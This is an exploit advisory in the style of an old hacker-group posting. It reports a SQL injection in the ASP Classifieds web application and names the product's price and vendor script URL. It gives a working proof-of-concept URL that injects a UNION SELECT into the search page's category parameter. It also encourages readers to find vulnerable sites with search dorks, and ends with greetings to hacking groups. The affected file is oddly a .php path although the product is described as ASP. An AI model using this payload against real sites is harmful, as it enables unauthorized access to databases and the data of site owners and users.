# Exploit Title: ASP Classifieds Sql Injection# Date: 17/03/2012# Author: r45c4l# Email: infosecpirate@gmail.com# Script url: http://preproject.com/pclasp/home/default.asp# Version: N/A# CVE : ()::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Product Description :
ASP Classifieds is one of the most customizable Classified ad program
that exist for ASP and Access. Unlimited Images , unlimited categories
and much much more makes it perfect for those who wants to set up a used
stamps classifieds to those wanting to show and sell real estates.
Product Cost :58$
=======================Exploit====================================---ICW---[ EXPL0!T ]
SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]
PoC -
http://SERVER/classi/search.php?category=-1+union+all+select+version()--[Note: Tested on demo website]
d0rk - use your brain ;)===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam
All members of ICW, AH and darkc0de,andall Indian Hackers
Special Greetz to : b4ltazar and s1nner_01
=== End ()====
